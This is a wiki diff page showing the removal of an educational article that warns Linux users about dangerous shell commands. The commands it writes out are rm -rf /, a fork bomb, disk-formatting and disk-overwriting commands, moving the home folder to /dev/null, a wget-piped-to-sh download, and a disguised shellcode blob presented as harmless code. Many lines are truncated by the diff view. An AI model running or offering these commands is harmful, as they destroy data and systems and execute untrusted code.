bash:dangerous_commands
Differences
This shows you the differences between two versions of the page.
Both sides previous revisionPrevious revisionNext revision | Previous revision | ||
bash:dangerous_commands [2019/11/24 20:17] – peter | bash:dangerous_commands [2021/01/26 16:19] (current) – removed peter | ||
---|---|---|---|
Line 1: | Line 1: | ||
- | ====== Bash - Dangerous Commands ====== | ||
- | |||
- | <WRAP alert> | ||
- | **ALERT**: | ||
- | </ | ||
- | |||
- | ---- | ||
- | |||
- | ===== rm -rf / ===== | ||
- | |||
- | <code bash> | ||
- | rm -rf / | ||
- | </ | ||
- | |||
- | The command **rm -rf /** deletes everything it possible can, including files on your hard drive and files on connected removable media devics. | ||
- | |||
- | * **rm** – Remove the following files. | ||
- | * **-rf** – Run rm recursively (delete all files and folders inside the specified folder) and force-remove all files without prompting you. | ||
- | * **/** – Tells rm to start at the root directory, which contains all the files on your computer and all mounted media devices, including remote file shares and removable drives. | ||
- | |||
- | Linux will happily obey this command and delete everything without prompting you, so be careful when using it! The **rm** command can also be used in other dangerous ways – **rm –rf ~** would delete all files in your home folder, while **rm -rf .*** would delete all your configuration files. | ||
- | |||
- | The Lesson: | ||
- | |||
- | ---- | ||
- | |||
- | ===== Disguised rm –rf / ===== | ||
- | |||
- | <code bash> | ||
- | char esp[] __attribute__ ((section(“.text”))) /* e.s.p | ||
- | release */ | ||
- | = “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68” | ||
- | “\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99” | ||
- | “\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7” | ||
- | “\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56” | ||
- | “\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31” | ||
- | “\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69” | ||
- | “\x6e\x2f\x73\x68\x00\x2d\x63\x00” | ||
- | “cp -p /bin/sh / | ||
- | / | ||
- | </ | ||
- | |||
- | This is the hex version of **rm –rf /** – executing this command would wipe out your files just as if you had run **rm –rf /**. | ||
- | |||
- | The Lesson: | ||
- | |||
- | ---- | ||
- | |||
- | ===== :(){ :|: & };: ===== | ||
- | |||
- | Fork Bomb. The following line is a simple-looking, | ||
- | |||
- | <code bash> | ||
- | :(){ :|: & };: | ||
- | </ | ||
- | |||
- | This short line defines a shell function that creates new copies of itself. | ||
- | |||
- | The Lesson: | ||
- | |||
- | ---- | ||
- | |||
- | ===== mkfs.ext4 /dev/sda1 ===== | ||
- | |||
- | <code bash> | ||
- | mkfs.ext4 /dev/sda1 | ||
- | </ | ||
- | |||
- | Formats a Hard Drive. | ||
- | |||
- | * **mkfs.ext4** – Create a new ext4 file system on the following device. | ||
- | * **/ | ||
- | |||
- | Taken together, this command can be equivalent to running **format c:** on Windows – it will wipe the files on your first partition and replace them with a new file system. | ||
- | |||
- | This command can come in other forms as well – **mkfs.ext3 /dev/sdb2** would format the second partition on the second hard drive with the ext3 file system. | ||
- | |||
- | The Lesson: | ||
- | |||
- | ---- | ||
- | |||
- | ===== command > /dev/sda ===== | ||
- | |||
- | <code bash> | ||
- | any_command > /dev/sda | ||
- | </ | ||
- | |||
- | Writes Directly to a Hard Drive. | ||
- | |||
- | * **command** – Run a command (can be any command.) | ||
- | * **>** – Send the output of the command to the following location. | ||
- | * **/ | ||
- | |||
- | The Lesson: | ||
- | |||
- | ---- | ||
- | |||
- | ===== dd if=/ | ||
- | |||
- | <code bash> | ||
- | dd if=/ | ||
- | </ | ||
- | |||
- | Writes Junk Onto a Hard Drive. | ||
- | |||
- | * **dd** – Perform low-level copying from one location to another. | ||
- | * **if=/ | ||
- | * **of=/ | ||
- | |||
- | The Lesson: | ||
- | |||
- | ---- | ||
- | |||
- | ===== mv ~ /dev/null ===== | ||
- | |||
- | <code bash> | ||
- | mv ~ /dev/null | ||
- | </ | ||
- | |||
- | Moves Your Home Directory to a Black Hole. **/ | ||
- | |||
- | * **mv** – Move the following file or directory to another location. | ||
- | * **~** – Represents your entire home folder. | ||
- | * **/ | ||
- | |||
- | The Lesson: | ||
- | |||
- | ---- | ||
- | |||
- | ===== wget http:// | ||
- | |||
- | <code bash> | ||
- | wget http:// | ||
- | </ | ||
- | |||
- | Downloads and Runs a Script. | ||
- | |||
- | * **wget** – Downloads a file. (You may also see curl in place of wget.) | ||
- | * **< | ||
- | * **|** – Pipe (send) the output of the wget command (the file you downloaded) directly to another command. | ||
- | * **sh** – Send the file to the sh command, which executes it if it’s a bash script. | ||
- | |||
- | The Lesson: | ||
- | |||
- | ---- | ||
- | |||
- | ===== References: ===== | ||
- | |||
- | * http:// | ||
- | |||
- | |||
bash/dangerous_commands.1574626623.txt.gz · Last modified: 2020/07/15 09:30 (external edit)